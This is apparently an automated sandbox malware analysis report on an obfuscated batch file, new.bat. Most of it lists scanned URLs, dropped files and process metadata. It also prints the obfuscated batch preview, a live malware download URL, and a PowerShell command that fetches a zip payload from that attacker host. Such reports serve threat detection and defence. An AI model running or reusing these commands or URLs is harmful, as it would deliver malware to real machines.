C:\Users\user\Downloads\Extracted\Python\Python312\Lib\doctest.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\_encoded_words.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\_header_value_parser.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\_policybase.py	0%	ReversingLabs
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\email\base64mime.py	0%	ReversingLabs

Source	Detection	Scanner	Label
https://bugs.python.org/issue?@action=redirect&bpo=35900	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=33725	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=33721	0%	Avira URL Cloud	safe
https://toml.io/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=35904	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=5237	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=32751	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0528/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=43882	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=4384	0%	Avira URL Cloud	safe
http://bugs.python.org/issue22107	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0529/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=30688	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=29235	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=33710	0%	Avira URL Cloud	safe
http://invoiceposs.shop:9005/FTSP.zip	100%	Avira URL Cloud	malware
https://bugs.python.org/issue?@action=redirect&bpo=32749	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0602/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=1696199	0%	Avira URL Cloud	safe
http://bugs.python.org/issue2528	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=1230540	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=28238	0%	Avira URL Cloud	safe
https://www.pypy.org/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=4285	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0526/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=32972	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0634/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=6584	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0538/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=33818	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=30661	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=30670	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=17239	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0624/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=36917	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0623/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=29209	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=33407	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0657/	0%	Avira URL Cloud	safe
https://twisted.org/documents/11.0.0/api/twisted.python.components.html	0%	Avira URL Cloud	safe
https://pyyaml.org/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=33530	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=34616	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=35702	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=30262	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=23831	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=32314	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=21536	0%	Avira URL Cloud	safe
http://svn.red-bean.com/bob/macholib/trunk/macholib/	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=5150	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=35813	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=34850	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=6137	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=35810	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=23722	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=32430	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=4195	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=22640	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=32417	0%	Avira URL Cloud	safe
https://infra.psf.io	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=27181	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=5175	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=32528	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=31553	0%	Avira URL Cloud	safe
https://bugs.python.org/issue?@action=redirect&bpo=34829	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://bugs.python.org/issue?@action=redirect&bpo=5237	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=35904	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=32751	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=33721	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0528/	init_config.html.17.dr	false	Avira URL Cloud: safe	unknown
https://toml.io/	3.11.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=33725	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=35900	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://datatracker.ietf.org/doc/html/rfc4122.html	uuid.html.17.dr, 2.5.html.17.dr	false		high
https://github.com/python/cpython/blob/main/Doc/whatsnew/3.11.rst	3.11.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=43882	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/c-api/coro.html	coro.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=4384	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/c-api/long.html	long.html.17.dr	false		high
http://bugs.python.org/issue22107	filesystem.py.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/search.html	search.html.17.dr	false		high
https://www.python.org/community/lists/	general.html.17.dr	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	base64.py.17.dr	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000000A.00000003.1822470393.000001EF1305F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugs.python.org/issue?@action=redirect&bpo=30688	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=32749	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/main/Doc/extending/embedding.rst	embedding.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=29235	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0602/	general.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=33710	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://wiki.python.org/moin/IntegratedDevelopmentEnvironments	editors.html.17.dr	false		high
https://peps.python.org/pep-0529/	3.8.html.17.dr, unicode.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/genindex-S.html	genindex-S.html.17.dr	false		high
http://bugs.python.org/issue2528	filesystem.py.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=1696199	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://www.redhat.com	general.html.17.dr	false		high
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode	transports.py.17.dr	false		high
http://invoiceposs.shop:9005/FTSP.zip	powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bugs.python.org/issue?@action=redirect&bpo=1230540	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=28238	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0526/	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://www.pypy.org/	introduction.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=32972	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0538/	init_config.html.17.dr	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 0000000A.00000002.3029148950.000001EF13200000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mail.python.org/mailman3/lists/python-announce-list.python.org/	general.html.17.dr	false		high
https://peps.python.org/pep-0634/	typeobj.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=4285	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=6584	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/tutorial/interpreter.html	interpreter.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=33818	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=30661	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/main/Doc/library/xml.sax.handler.rst	xml.sax.handler.html.17.dr	false		high
https://peps.python.org/pep-0624/	3.11.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/pygments/pygments/issues	cmdline.py.17.dr, cmdline.cpython-312.pyc.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=17239	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0623/	unicode.html.17.dr, 3.12.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=30670	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://wiki.python.org/moin/PythonBooks	general.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=29209	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=33407	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=36917	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://twisted.org/documents/11.0.0/api/twisted.python.components.html	unittest.mock-examples.html.17.dr	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0657/	3.11.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/whatsnew/3.8.html	3.8.html.17.dr	false		high
https://mail.python.org/mailman3/lists/python-dev.python.org/	general.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=32314	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=34616	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=35702	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://pyyaml.org/	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/re.html#re.sub	core.cpython-312.pyc.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=33530	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py	unittest.mock.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=23831	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=30262	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=21536	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
http://svn.red-bean.com/bob/macholib/trunk/macholib/	README.ctypes.17.dr, fetch_macholib.bat.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=5150	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/tree/3.12/Lib/xml/sax/handler.py	xml.sax.handler.html.17.dr	false		high
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/perf/Documentation/jit	perfmaps.html.17.dr	false		high
https://github.com/python/cpython/issues/83743	3.8.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=22640	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=6137	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=35810	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/pypa/pip/pull/3514	req_file.cpython-312.pyc.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=35813	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=34850	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=32430	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=23722	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=4195	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/main/Doc/c-api/unicode.rst	unicode.html.17.dr	false		high
https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rst	capsule.html.17.dr	false		high
https://docs.python.org/3/library/xml.sax.handler.html	xml.sax.handler.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=32417	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://docs.python.org	whatnow.html.17.dr, 2.5.html.17.dr	false		high
https://docs.python.org/3/using/unix.html	unix.html0.17.dr	false		high
https://infra.psf.io	general.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=27181	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://pypi.org/project/mock	unittest.mock.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=5175	3.1.html.17.dr	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/main/Doc/faq/general.rst	general.html.17.dr	false		high
https://ark.intel.com/content/www/us/en/ark/products/76088/intel-core-i7-4960hq-processor-6m-cache-u	3.8.html.17.dr	false		high
https://bugs.python.org/issue?@action=redirect&bpo=32528	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=34829	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown
https://bugs.python.org/issue?@action=redirect&bpo=31553	3.8.html.17.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
154.216.16.111	unknown	Seychelles		135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554412
Start date and time:	2024-11-12 14:29:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	new.bat
Detection:	MAL
Classification:	mal72.spre.winBAT@34/1071@0/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.19.126.143, 2.19.126.149, 184.28.88.176, 107.22.247.231, 34.193.227.236, 18.207.85.246, 54.144.73.197, 162.159.61.3, 172.64.41.3, 184.28.90.27, 2.23.197.184, 88.221.168.141, 199.232.214.172, 2.16.164.112, 2.16.164.16, 2.16.164.91, 2.16.164.131, 2.16.164.107, 2.16.164.113, 192.168.2.4, 23.218.232.146
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
Execution Graph export aborted for target powershell.exe, PID 3756 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: new.bat

Simulations

Behavior and APIs

Time	Type	Description
08:30:09	API Interceptor	74x Sleep call for process: powershell.exe modified
08:30:12	API Interceptor	2x Sleep call for process: svchost.exe modified
08:30:22	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
08:31:33	API Interceptor	2339x Sleep call for process: conhost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	file.exe	Get hash	malicious	Remcos	Browse	154.216.20.185
	Salary Increase Letter_Nov 20244.exe	Get hash	malicious	Remcos	Browse	154.216.17.14
	vqsjh4.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	jwwofba5.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	wriww68k.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	wnbw86.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	dwhdbg.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	vsbeps.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	vkjqpc.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	dvwkja7.elf	Get hash	malicious	Mirai	Browse	154.216.16.109

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_aix_support.py	aba.bat	Get hash	malicious	Unknown	Browse
	tut.bat	Get hash	malicious	Unknown	Browse
	8n3W4yKYeB.exe	Get hash	malicious	Unknown	Browse
	contract_review.exe	Get hash	malicious	XWorm	Browse
	new.bat	Get hash	malicious	Unknown	Browse
	new.bat	Get hash	malicious	Unknown	Browse
	pypa.py	Get hash	malicious	Unknown	Browse
C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_collections_abc.py	aba.bat	Get hash	malicious	Unknown	Browse
	tut.bat	Get hash	malicious	Unknown	Browse
	8n3W4yKYeB.exe	Get hash	malicious	Unknown	Browse
	contract_review.exe	Get hash	malicious	XWorm	Browse
	new.bat	Get hash	malicious	Unknown	Browse
	new.bat	Get hash	malicious	Unknown	Browse
	pypa.py	Get hash	malicious	Unknown	Browse

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073609121298175
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrn:KooCEYhgYEL0In
MD5:	BAC3CD8207B7EF364B00BE15545BF33A
SHA1:	A488455EDEDF6C4853F61660664A1EAD016BD68F
SHA-256:	9DBF8B83D175EECF4C3021BD709B0315AE49B43A3C207F290DAE95B51936F9D5
SHA-512:	B1CDBCB9F5D0060A0B131A8D379720FC4A383E9F9143AA3EDE9D3929D1899FFCE99376B48C856FA5CA2F78EB82DD2FF8D3DCFDC3665408B2A5F1C087B743AAA4
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.150624185100461
Encrypted:	false
SSDEEP:	6:HU4UhgL+q2Pwkn2nKuAl9OmbnIFUt8YU4Uhbo1Zmw+YU4Uhb+LVkwOwkn2nKuAlz:KA+vYfHAahFUt8Fc1/+FeV5JfHAaSJ
MD5:	C2003E0F5DB5DC40A7FC5C9A179DA277
SHA1:	5BD9D100F9BE988612C9F9536164A018FA9C265F
SHA-256:	1EA9B9FB905694803B03BF6633C6B95CFBFD4BE28AD49CD0ADACA3EA5DC32BAC
SHA-512:	4CAFBD37D8680DDD4F35C4CAB17D57EA69B572D4F689BB4AEC2E52FF2A3A91676B65F3CC7B0D813F04D515435D164F96751C3625FE5411C162D0FF9DB2F3A181
Malicious:	false
Preview:	2024/11/12-08:30:11.151 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-08:30:11.153 1c9c Recovering log #3.2024/11/12-08:30:11.153 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	26604
Entropy (8bit):	5.053883819182895
Encrypted:	false
SSDEEP:	768:CinHzwiNKe+NZotAHk4VlOdB5cCYoUV3IpNBQkj29YQhj9ardFwOkMx:CinHzwiNKeLtAHk4VlOdB5cCYoUV3CNT
MD5:	7BB845A66FBC67C74AF32B48E35AC529
SHA1:	654F71D7B8EEF31D6DEFD3C5C9301DD88C7CC0B7
SHA-256:	03BCB325459833E54C43C7ACD18061CEBB288BC23E5310247CDD6F9AABB7C285
SHA-512:	A9D660C3DBB2EAE24BD1F4F0FEE60F697975839DDA07EA8E60061CE89190983464F32C3505587C5122E898A7C173E1AD97143C2D7FD414EDA78094AAEDCAB898
Malicious:	false
Preview:	PSMODULECACHE.(.......z..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1........Add-MpPreference........Get-MpThreatCatalog........Get-MpThreat........Update-MpSignature........Remove-MpPreference........Get-MpPreference........Get-MpThreatDetection........Set-MpPreference........Get-MpComputerStatus........Start-MpScan........Start-MpWDOScan........Remove-MpThreat.........wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerSh

File type:	Unicode text, UTF-16, little-endian text, with very long lines (17429), with no line terminators
Entropy (8bit):	3.9670450741027063
TrID:	Text - UTF-16 (LE) encoded (2002/1) 66.67% MP3 audio (1001/1) 33.33%
File name:	new.bat
File size:	34'861 bytes
MD5:	7b66e627772c9938b6aa1295f677440e
SHA1:	f205c9ef9b3c1792b10970ba1b49ffdbba35ef9d
SHA256:	37ff3fde213752b29ba69ac327b27de8f4e93d6de8534e0cb0f781c1a493c2ab
SHA512:	50939cbe7d9cbc7269350b0b0edac2b0f91776189e589f53c5d3a7c828acd831c38d28955dcc498a2dfd00da499514ce0b5cf5a2b1b3872db85854bb5393ee18
SSDEEP:	192:nK0JLZYjFsqH0melk6y8g1sDYiS+DS5nbl6HNifZUESNTfs8wUWZSr18qvqS:Kzds5YirSJlKOZUEgTU8CZwqS
TLSH:	D2F2ECA07BF3070A304EB8DBA1A374111D96F47E26FB289ADD153D6489C51089F06BFB
File Content Preview:	..&@cls&@set ".joL.=j1ot5Nd4rRHnzkO lZWv3aFAXs9gipw8The0VKfUyIbuJ7EGxC6MQ@2cqBLDPYSm"..%.joL.:~53,1%%.joL.:~34,1%%.joL.:~55,1%%.joL.:~33,1%%.joL.:~2,1%%.joL.:~15,1%%.joL.:~2,1%%.joL.:~38,1%%.joL.:~38,1%%..p.eo.%..%.joL.:~25,1%%.joL.:~34,1%%.joL.:~3,1%%.jo

Target ID:	0
Start time:	08:30:06
Start date:	12/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Imagebase:	0x7ff64eb20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	08:30:07
Start date:	12/11/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	08:30:08
Start date:	12/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	08:30:10
Start date:	12/11/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	11
Start time:	08:30:11
Start date:	12/11/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
